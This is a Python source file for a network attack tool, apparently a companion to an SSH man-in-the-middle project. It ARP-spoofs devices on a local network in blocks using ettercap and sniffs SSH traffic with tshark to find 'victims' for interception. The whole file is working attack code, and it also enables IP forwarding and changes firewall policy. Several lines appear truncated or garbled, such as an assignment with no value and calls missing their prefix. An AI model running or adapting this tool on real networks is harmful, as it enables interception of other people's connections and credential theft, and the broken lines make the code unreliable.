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- #!/usr/bin/python3
- #
- #
- # Copyright (C) 2017 Joe Testa <>
- #
- # This program is free software: you can redistribute it and/or modify
- # it under the terms version 3 of the GNU General Public License as
- # published by the Free Software Foundation.
- #
- # This program is distributed in the hope that it will be useful,
- # but WITHOUT ANY WARRANTY; without even the implied warranty of
- # GNU General Public License for more details.
- #
- # You should have received a copy of the GNU General Public License
- # along with this program. If not, see <>.
- #
- #
- # Version: 1.0
- # Date: June 28, 2017
- #
- #
- # This tool ARP spoofs the LAN in small chunks and looks for existing SSH
- # connections. This makes finding victims for SSH man-in-the-middling very
- # easy (see
- #
- # Install prerequisites with:
- # apt install nmap ettercap-text-only tshark python3-netaddr python3-netifaces
- #
- # Built-in modules.
- import argparse, importlib, ipaddress, os, signal, subprocess, sys, tempfile
- from time import sleep
- # Python3 is required.
- if sys.version_info.major < 3:
- print('Error: Python3 is required. Re-run using python3 interpreter.')
- exit(-1)
- # Check if the netaddr and netifaces modules can be imported. Otherwise, print
- # a useful message to the user with how to install them.
- old_netifaces = False
- try:
- import netaddr, netifaces
- # Check if we're using an old version of netifaces (used in Ubuntu 14 and
- # Linux Mint 17). If so, the user will need to specify the gateway
- # manually.
- if (netifaces.version.startswith('0.8')):
- old_netifaces = True
- except ImportError as e:
- print("The Python3 netaddr and/or netifaces module is not installed. Fix with: apt install python3-netaddr python3-netifaces")
- exit(-1)
- ettercap_proc = None
- tshark_proc = None
- forwarding_was_off = None
- verbose = False
- debug = False
- # The overall findings, printed upon program termination.
- total_local_clients = []
- total_local_servers = []
- # Debug logging.
- def d(msg):
- if debug:
- print(msg, flush=True)
- # Verbose logging.
- def v(msg):
- if verbose:
- print(msg, flush=True)
- # Always print.
- def p(msg=''):
- print(msg, flush=True)
- # Captures control-C interruptions and gracefully terminates tshark and
- # ettercap.
- def signal_handler(signum, frame):
- global ettercap_proc, tshark_proc, forwarding_was_off
- d('Signal handler called.')
- p("\nShutting down ettercap and tshark gracefully. Please wait...")
- # tshark can just be terminated.
- if tshark_proc is not None:
- d('Sending tshark SIGTERM...')
- tshark_proc.terminate()
- # ettercap, however, needs to be shut down gracefully so it can re-ARP
- # victims.
- if ettercap_proc is not None:
- d('Telling ettercap to shut down gracefully...')
- try:
- ettercap_proc.communicate("q\n".encode('ascii'))
- except ValueError as e:
- # It is possible that the main thread already called communicate(),
- # to terminate the process, so calling it again causes an exception.
- # In this case, just wait for it to terminate.
- pass
- # Wait up to 20 seconds for tshark to terminate, then print its return code
- # to the debug log.
- if tshark_proc is not None:
- try:
- retcode = tshark_proc.wait(20)
- tshark_proc = None
- d('tshark terminated with return code %d' % retcode)
- except subprocess.TimeoutExpired as e:
- p('WARNING: tshark did not terminate after 20 seconds! Sending SIGKILL...')
- pass
- # tshark survived more than 20 seconds after a SIGTERM, so now send it
- # SIGKILL and wait up to 10 more seconds.
- if tshark_proc is not None:
- try:
- tshark_proc.kill()
- retcode = tshark_proc.wait(10)
- tshark_proc = None
- d('After SIGKILL, tshark terminated with return code %d' % retcode)
- except subprocess.TimeoutExpired as e:
- p('ERROR: tshark did not terminate after 10 seconds, even with SIGKILL. Try manually killing it (process ID %d).' %
- pass
- # Wait up to 20 seconds for ettercap to quit after telling it to.
- if ettercap_proc is not None:
- try:
- retcode = ettercap_proc.wait(20)
- ettercap_proc = None
- d('ettercap terminated with return code %d' % retcode)
- except subprocess.TimeoutExpired as e:
- pass
- # ettercap survived more than 20 seconds after a SIGTERM, so now send it
- # SIGKILL and wait up to 10 more seconds.
- if ettercap_proc is not None:
- d('WARNING: ettercap did not exit gracefully after requesting it to quit. Now sending it SIGKILL...')
- ettercap_proc.kill()
- try:
- retcode = ettercap_proc.wait(10)
- ettercap_proc = None
- d('ettercap terminated with return code %d' % retcode)
- except subprocess.TimeoutExpired as e:
- p('ERROR: ettercap did not terminate after 10 seconds, even with SIGKILL. Try manually killing it (process ID %d).' %
- pass
- # If IP forwarding was off before this script was launched, disable it
- # before terminating.
- if forwarding_was_off is True:
- v('IP forwarding was off before. Disabling it now...')
- enable_ip_forwarding(False)
- # Print all the IPs found.
- p()
- if len(total_local_clients) > 0:
- p("\nTotal local clients:")
- for tup in total_local_clients:
- p(' * %s -> %s:22' % (tup[0], tup[1]))
- p()
- else:
- p('No local clients found. :(')
- if len(total_local_servers) > 0:
- p("\nTotal local servers:")
- for tup in total_local_servers:
- p(' * %s -> %s:22' % (tup[1], tup[0]))
- p()
- exit(0)
- # Ensure that nmap, ettercap, and tshark are all installed, and we are running
- # as root. Terminates otherwise.
- def check_prereqs():
- missing_progs = []
- if not find_prog(['nmap', '-V']):
- missing_progs.append('nmap')
- if not find_prog(['ettercap', '-v']):
- missing_progs.append('ettercap-text-only')
- if not find_prog(['tshark', '-v']):
- missing_progs.append('tshark')
- if len(missing_progs) > 0:
- missing_progs_str = ' '.join(missing_progs)
- p("Error: the following pre-requisite programs are missing: %s\n\nInstall them with: apt install %s" % (missing_progs_str, missing_progs_str))
- exit(-1)
- # We must be running as root for ettercap to work.
- if os.geteuid() != 0:
- p("Error: you must run this script as root.")
- exit(-1)
- # Check if there are existing PREROUTING NAT rules enabled, and warn the
- # user of potential side-effects.
- try:
- hProc = subprocess.Popen(['iptables', '-t', 'nat', '-nL', 'PREROUTING'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL)
- so, se = hProc.communicate()
- prerouting_output = so.decode('ascii')
- # Output with no rules has two lines.
- if prerouting_output.count("\n") > 2:
- p("\nWARNING: it appears that you have entries in your PREROUTING NAT table. Searching for SSH connections on the LAN with this script while PREROUTING rules are enabled may have unintended side-effects. The output of 'iptables -t nat -nL PREROUTING' is:\n\n%s\n\n" % prerouting_output)
- except FileNotFoundError as e:
- p('Warning: failed to run iptables. Continuing...')
- pass
- # Returns True if a program is installed on the system, otherwise False.
- def find_prog(prog_args):
- prog_found = False
- try:
- hProc = subprocess.Popen(prog_args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL)
- s, e = hProc.communicate()
- prog_found = True
- except FileNotFoundError as e:
- pass
- return prog_found
- # Returns True if IP forwarding is enabled, otherwise False.
- def get_ip_forward_settings():
- ipv4_setting = None
- with open('/proc/sys/net/ipv4/ip_forward', 'r') as f:
- ipv4_setting =
- return ipv4_setting.strip() == '1'
- # Enables or disables IP forwarding. If it was disabled prior to calling this
- # function, returns True (helpful for knowing if it needs to be turned back off
- # later).
- def enable_ip_forwarding(flag):
- old_ipv4_setting = get_ip_forward_settings()
- if flag and not old_ipv4_setting:
- with open('/proc/sys/net/ipv4/ip_forward', 'w') as f:
- f.write('1')
- if not flag and old_ipv4_setting:
- with open('/proc/sys/net/ipv4/ip_forward', 'w') as f:
- f.write('0')
- # Enable or disable forwarding in the firewall, as appropriate.
- if flag:
-"iptables -P FORWARD ACCEPT", shell=True)
- else:
-"iptables -P FORWARD DROP", shell=True)
- current_ipv4_setting = get_ip_forward_settings()
- if current_ipv4_setting != flag:
- raise RuntimeError('Failed to set IP forwarding setting!: %r %r' % (current_ipv4_setting, flag))
- return old_ipv4_setting == False
- # Runs nmap to get the devices on the LAN that are alive (using ARP pings).
- def get_lan_devices(network, gateway, ignore_list):
- ret = []
- fd, temp = tempfile.mkstemp()
- os.close(fd)
- hNmap = subprocess.Popen(['nmap', '-n', '-oG=%s' % temp, '-sn', '-PR', network], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL)
- try:
- hNmap.wait(30)
- except subprocess.TimeoutExpired as e:
- p('Nmap ARP ping took longer than 30 seconds. Terminating...')
- exit(-1)
- nmap_output = ''
- with open(temp, 'r') as f:
- nmap_output = f.readlines()
- # Delete nmap's output file.
- if os.path.exists(temp):
- os.remove(temp)
- for line in nmap_output:
- tokens = line.split()
- if tokens[0] == 'Host:':
- ret.append(tokens[1])
- # Remove the gateway from the list of live devices.
- if gateway in ret:
- ret.remove(gateway)
- # Remove the entries of the ignore_list from the list of live devices.
- for ip in ignore_list:
- if ip in ret:
- ret.remove(ip)
- return ret
- # Splits a list of devices into blocks of size "block_size".
- def blocketize_devices(devices, block_size):
- device_blocks = []
- device_block = []
- i = 0
- for device in devices:
- device_block.append(device)
- i += 1
- if (i >= block_size) or (devices.index(device) == (len(devices) - 1)) :
- i = 0
- device_blocks.append(device_block)
- device_block = []
- return device_blocks
- def arp_spoof_and_monitor(interface, local_addresses, gateway, device_block, listen_time):
- global ettercap_proc, tshark_proc
- # Run tshark with an SSH filter.
- tshark_args = ['tshark', '-i', interface, '-T', 'fields', '-e', 'ip.src', '-e', 'ip.dst', '-e', 'tcp.port']
- # Exclude packets to or from the local machine.
- if len(local_addresses) > 0:
- tshark_args.extend(['-f', 'port 22 and not(host %s)' % ' or host '.join(local_addresses)])
- else:
- tshark_args.extend(['-f', 'port 22'])
- d('Running tshark: %s' % ' '.join(tshark_args))
- tshark_proc = subprocess.Popen(tshark_args, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL)
- # ARP spoof the block of devices and gateway.
- ettercap_args = ['ettercap', '-i', interface, '-T', '-M', 'arp', '/%s//' % gateway, '/%s//' % ','.join(device_block)]
- d('Running ettercap: %s' % ' '.join(ettercap_args))
- ettercap_proc = subprocess.Popen(ettercap_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
- # Sleep for the specified number of seconds while tshark gathers info.
- d('Sleeping for %d seconds...' % listen_time)
- sleep(listen_time)
- # Stop tshark.
- tshark_proc.terminate()
- # Send 'q' and a newline to tell ettercap to quit gracefully.
- so, se = ettercap_proc.communicate("q\n".encode('ascii'))
- # Get the output from the terminated tshark process.
- so, se = tshark_proc.communicate()
- lines = so.decode('ascii').split("\n")
- local_clients = []
- local_servers = []
- # Each line is in the following format:
- # 10.x.x.x\t174.x.x.x\t38564,22
- for line in lines:
- if line == '':
- continue
- fields = line.split("\t")
- ip1 = fields[0]
- ip2 = fields[1]
- ports = fields[2].split(',')
- port1 = ports[0]
- port2 = ports[1]
- local_client = None
- local_server = None
- remote_client = None
- remote_server = None
- if (ip1 in device_block) and (port2 == '22'):
- local_client = ip1
- remote_server = ip2
- elif (ip2 in device_block) and (port1 == '22'):
- local_client = ip2
- remote_server = ip1
- elif (ip1 in device_block) and (port1 == '22'):
- local_server = ip1
- remote_client = ip2
- elif (ip2 in device_block) and (port2 == '22'):
- local_server = ip2
- remote_client = ip1
- else:
- p('Strange tshark output found: [%s]' % line)
- p("\tdevice block: [%s]" % ",".join(device_block))
- continue
- # Look for outgoing connections.
- if (local_client is not None) and (remote_server is not None):
- tup = (local_client, remote_server)
- if tup not in local_clients:
- local_clients.append(tup)
- # Look for incoming connections (implying a server is running on the
- # LAN).
- elif (local_server is not None) and (remote_client is not None):
- tup = (local_server, remote_client)
- if tup not in local_servers:
- local_servers.append(tup)
- if len(local_clients) == 0 and len(local_servers) == 0:
- v('No SSH connections found.')
- if len(local_clients) > 0:
- p("\nLocal clients:")
- for tup in local_clients:
- p(' * %s -> %s:22' % (tup[0], tup[1]))
- p()
- total_local_clients.extend(x for x in local_clients if x not in total_local_clients)
- if len(local_servers) > 0:
- p("\nLocal servers:")
- for tup in local_servers:
- p(' * %s -> %s:22' % (tup[1], tup[0]))
- p()
- total_local_servers.extend(x for x in local_servers if x not in total_local_servers)
- if __name__ == '__main__':
- check_prereqs()
- parser = argparse.ArgumentParser()
- required = parser.add_argument_group('required arguments')
- required.add_argument('--interface', help='the network interface to listen on', required=True)
- parser.add_argument('--block-size', help='the number of IPs to ARP spoof at a time (default: 5)', default=5)
- parser.add_argument('--listen-time', help='the number of seconds to listen for SSH activity (default: 20)', default=20)
- parser.add_argument('--ignore-ips', help='the IPs to ignore. Can be space or comma-delimited', nargs='+', default=[])
- parser.add_argument('--one-pass', help='perform one pass of the network only, instead of looping', action='store_true')
- parser.add_argument('-v', '--verbose', help='enable verbose messages', action='store_true')
- parser.add_argument('-d', '--debug', help='enable debugging messages', action='store_true')
- # If we loaded an old netifaces module, the user must specify the gateway
- # manually.
- if old_netifaces:
- required.add_argument('--gateway', help='the network gateway', required=True)
- args = vars(parser.parse_args())
- # The network interface to use.
- interface = args['interface']
- # A list of IPs to ignore.
- ignore_list = args['ignore_ips']
- # If the user specified the ignore list as "--ignore-ips,",
- # parse them out into a list.
- if len(ignore_list) == 1:
- ips = ignore_list[0]
- if ips.find(',') != -1:
- ignore_list = ips.split(',')
- # Ensure IPs are in a valid form.
- for ip in ignore_list:
- try:
- ipaddress.ip_address(ip)
- except ValueError as e:
- p('Error: %s is not a valid IP address.' % ip)
- exit(-1)
- # Parse the interface arg.
- addresses = None
- try:
- addresses = netifaces.ifaddresses(interface)
- except ValueError as e:
- p('Error parsing interface: %s' % str(e))
- exit(-1)
- # Add our address(es) to the ignore list.
- local_addresses = []
- if netifaces.AF_INET in addresses:
- for net_info in addresses[netifaces.AF_INET]:
- address = net_info['addr']
- p("Found local address %s and adding to ignore list." % address)
- local_addresses.append(address)
- ignore_list.append(address)
- if len(local_addresses) == 0:
- p("Error: failed to get the IP address for interface %s" % interface)
- exit(-1)
- # Get the CIDR format of our network.
- net_info = addresses[netifaces.AF_INET][0]
- net_cidr = str(netaddr.IPNetwork('%s/%s' % (net_info['addr'], net_info['netmask'])))
- p("Using network CIDR %s." % net_cidr)
- # Get the default gateway.
- if old_netifaces:
- gateway = args['gateway']
- else:
- gateway = netifaces.gateways()['default'][netifaces.AF_INET][0]
- p("Found default gateway: %s" % gateway)
- # The number of IPs in the LAN to ARP spoof at a time. This should be a
- # relatively low number, as spoofing too many clients at a time can cause
- # noticeable slowdowns.
- block_size = int(args['block_size'])
- # The number of seconds to sniff a MITMed block of clients before moving on
- # to the next block.
- listen_time = int(args['listen_time'])
- # If True, only one pass is done over the clients in the network.
- # Otherwise, it will loop indefinitely.
- one_pass = args['one_pass']
- # Flags to control verbose and debug outputs.
- verbose = args['verbose']
- debug = args['debug']
- p('IP blocks of size %d will be spoofed for %d seconds each.' % (block_size, listen_time))
- if len(ignore_list) > 0:
- p('The following IPs will be skipped: %s' % ' '.join(ignore_list))
- if one_pass:
- p('The network will be scanned in only one pass.')
- p("\n")
- # If the user raised the block size to 10 or greater, warn them about the
- # potential consequences.
- if block_size >= 10:
- p("WARNING: setting the block size too high will cause strain on your network interface. Eventually, your interface will start dropping frames, causing a network denial-of-service and greatly raising suspicion. However, raising the block size is safe on low-utilization networks. You better know what you're doing!\n")
- # Enable the signal handlers so that ettercap and tshark gracefully shut
- # down on CTRL-C.
- signal.signal(signal.SIGINT, signal_handler)
- signal.signal(signal.SIGTERM, signal_handler)
- forwarding_was_off = enable_ip_forwarding(True)
- while True:
- v('Discovering devices on LAN via ARP ping...')
- devices = get_lan_devices(net_cidr, gateway, ignore_list)
- d('%d devices discovered: %s' % (len(devices), ", ".join(devices)))
- # Arrange the devices into groups of size "block_size".
- device_blocks = blocketize_devices(devices, block_size)
- # ARP spoof and monitor each block.
- for device_block in device_blocks:
- arp_spoof_and_monitor(interface, local_addresses, gateway, device_block, listen_time)
- # If we are only supposed to do one pass, then stop now.
- if one_pass:
- break
- # If IP forwarding was off before we started, turn it off now.
- if forwarding_was_off:
- enable_ip_forwarding(False)
- p('Single pass complete.')
- exit(0)
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